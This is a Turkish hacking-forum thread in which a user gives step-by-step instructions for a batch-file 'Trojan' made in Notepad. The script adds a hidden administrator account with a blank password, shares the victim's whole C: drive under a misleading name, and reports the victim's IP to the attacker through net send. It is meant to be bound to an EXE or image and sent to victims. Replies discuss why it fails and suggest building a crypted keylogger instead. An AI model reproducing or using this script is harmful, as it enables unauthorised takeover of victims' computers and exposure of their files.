İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Not Defteri İle Truva Atı Yapımı

24-11-2014 11:55
#1
Parklee - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2014
Nereden:
California
Yaş:
22
Mesajlar:
2.332
Teşekkür (Etti):
2828
Teşekkür (Aldı):
2221
Konular:
301
Ticaret:
(0) %
Evet arkadaslar* konunun başlığından da anlayabileceginiz gibi Anti Virüs programları tarafından tanınmayan tamamen size ait bir truva atı yapmayı size kısaca anlatacağım.

Truva atının ana amacı* adından da anlaşılacağı gibi hedef sisteme sızarak sistemi ele geçirmek ya da bilgi toplamaktır. Dikkat edin zarar vermek demiyorum çünkü bu etik olarak yanlış bir harekettir

Şimdi Truva atımızı hazırlamaya başlayalım


1-) Öncelikle bir TXT dosyası açın ve içine şu komutu girin;


net user HACK /add


Bu komut sayesinde kurbanin makinasında "HACK" isminde bir user yarattık. Fakat bu user hesabı normal olarak açıldigi icin hakları da sınırlı olacaktır. Bu nedenle ikinci aşamaya geçiyoruz;


2-) şimdi yukarıdaki komutun hemen bir alt satırına geçin ve şu komutu ekleyin;


net localgroup administrators HACK /add


Böylece "HACK" isimli kullanıcı hesabını* direk yönetici(admin) grubuna kattık. Artık "HACK" hesabımız tüm yetkilere sahip.


3-) Simdi de kurbanımızın makinasındaki C: sürücüsünü sınırsız paylaşıma açacağız. Kurbanı da huylandırmamak için paylaşım adını SYSTEM olarak yapacağız. Bunun için aşağıdaki komutu kullanacağız;


net share system=C: /unlimited


Evet artık Kurbanımızın makinasını sonuna kadar açtık. Peki kurbanın IP sini nereden bileceğiz de kurbanın makinasina bu yarattığımız "HACK" hesabından bağlanacağız?

Bunun için de kodumuza bir satırlık bir komut daha ekleyeceğiz;


4-) NET SEND komutunu kullanarak kurbanın bize Windows’un Messaging Servisi vasıtası ile mesaj atmasını ve IP sını bize söylemesini saglayacağız. Bunun icin aşağıdaki komutu da kodunuzun içerisine ekleyin;


net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbanınım Gel bana baglan

Unutmayın 82. li baslayan IP adresi yerine kendi IP nizi yazin.


4-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiğiniz gibi Windows Messenger Servisini kullanan internette ortalıkta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled ’dir. Disabled olursa NET SEND komutu bir işe yaramaz. Iste bu son önlemimizde de bu servisi Disabled tan Automatic moduna set ettirecegiz. Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adını öğreniyoruz. Adi Messenger ’mis. simdi bu adı kullanarak bu servisi çalıstırıyoruz.

net start Messenger


Size tavsiyem bu son komutu kodunuzun en basina koymaniz. Böylelikle ardışık sırada önce Messenger servisi çalıştırılacak daha sonra diğer işlemler yapılacaktır. Kodun sağlıklı çalışması açısından bu 4. şıkkı ilk sıraya koymanız daha iyi olur.

Son olarak TXT de yazdığınız kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.

Kurbanınız bu dosyayı çalıştırdiğı an makinasında Admin haklarına sahip HACK adında bir user açılacak ve şifresi de blank yani boş olacaktır. C: sürücüsü de full olarak paylasima açilmış olacak ve son olarak da IP si size gelecektir.
Kullanıcı İmzası

Eski Saldırı Timi Üyesi
2014 - 2016

Tarihin seni yazmasını bekleme , tarihi sen yaz içine kendini koy.
Veteran 7
AlparslaNN, shz007 Teşekkür etti.

24-11-2014 16:21
#2
wolvern - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2006
Mesajlar:
33
Teşekkür (Etti):
15
Teşekkür (Aldı):
3
Konular:
3
Ticaret:
(0) %
Kullanıcı uygulamayı çalıştırdıktan sonra msj bize nasıl gelecek nerede görücez ?
24-11-2014 19:30
#3
Parklee - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2014
Nereden:
California
Yaş:
22
Mesajlar:
2.332
Teşekkür (Etti):
2828
Teşekkür (Aldı):
2221
Konular:
301
Ticaret:
(0) %
[B][net start Messenger bu kod sayesinde sizin ekranınızda mesaj kutusunda ip adresi olacaktır. /B]
Kullanıcı İmzası

Eski Saldırı Timi Üyesi
2014 - 2016

Tarihin seni yazmasını bekleme , tarihi sen yaz içine kendini koy.
Veteran 7
10-01-2015 14:54
#4
Üyelik tarihi:
10/2014
Nereden:
Diyarbakır
Mesajlar:
3
Teşekkür (Etti):
3
Teşekkür (Aldı):
0
Konular:
1
Ticaret:
(0) %
Kardeş Nereye Mesaj nereye gelcek ayrıntılı anlatırmısın
10-01-2015 15:00
#5
Parklee - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2014
Nereden:
California
Yaş:
22
Mesajlar:
2.332
Teşekkür (Etti):
2828
Teşekkür (Aldı):
2221
Konular:
301
Ticaret:
(0) %
Alıntı:
Armancvural21´isimli üyeden Alıntı Mesajı göster
Kardeş Nereye Mesaj nereye gelcek ayrıntılı anlatırmısın
Mesaj direk ekranda karşına çıkacak zaten.
Kullanıcı İmzası

Eski Saldırı Timi Üyesi
2014 - 2016

Tarihin seni yazmasını bekleme , tarihi sen yaz içine kendini koy.
Veteran 7
14-01-2015 01:35
#6
batustixx - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2013
Mesajlar:
75
Teşekkür (Etti):
18
Teşekkür (Aldı):
4
Konular:
48
Ticaret:
(0) %
süper
Kullanıcı İmzası
Ister herkesi tarafina çek, kek,
Iyi kalem tutan bilek, söz atan tüfek, ben...
Siz salyasi yere akan köpekten farksizlarsiniz,
:inv
14-01-2015 01:39
#7
'AdrenaLiN - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2012
Mesajlar:
8.360
Teşekkür (Etti):
796
Teşekkür (Aldı):
3862
Konular:
1615
Ticaret:
(0) %
Eline sağlık denedin mi kardeşim ?
14-01-2015 01:45
#8
2nokta - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2013
Yaş:
27
Mesajlar:
16.757
Teşekkür (Etti):
10721
Teşekkür (Aldı):
7716
Konular:
2064
Ticaret:
(0) %
Antvirs kullanmıyorum.Yaptım ama hala bir şey yok?
win8 kullanıyorum alakası olabilir mi
14-01-2015 17:52
#9
xHusky - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2014
Nereden:
Antalya
Mesajlar:
89
Teşekkür (Etti):
0
Teşekkür (Aldı):
9
Konular:
26
Ticaret:
(0) %
bu bat dan virüs yapma olayları 2005 falan zamanları bunlar pek kullanılmaz bunun yerine bi keylooger yapın crypterlayın
14-01-2015 19:08
#10
Parklee - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2014
Nereden:
California
Yaş:
22
Mesajlar:
2.332
Teşekkür (Etti):
2828
Teşekkür (Aldı):
2221
Konular:
301
Ticaret:
(0) %
Alıntı:
2nokta´isimli üyeden Alıntı Mesajı göster
Antvirs kullanmıyorum.Yaptım ama hala bir şey yok?
win8 kullanıyorum alakası olabilir mi
Tabikide olur windows defender engelliyor.
Kullanıcı İmzası

Eski Saldırı Timi Üyesi
2014 - 2016

Tarihin seni yazmasını bekleme , tarihi sen yaz içine kendini koy.
Veteran 7

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı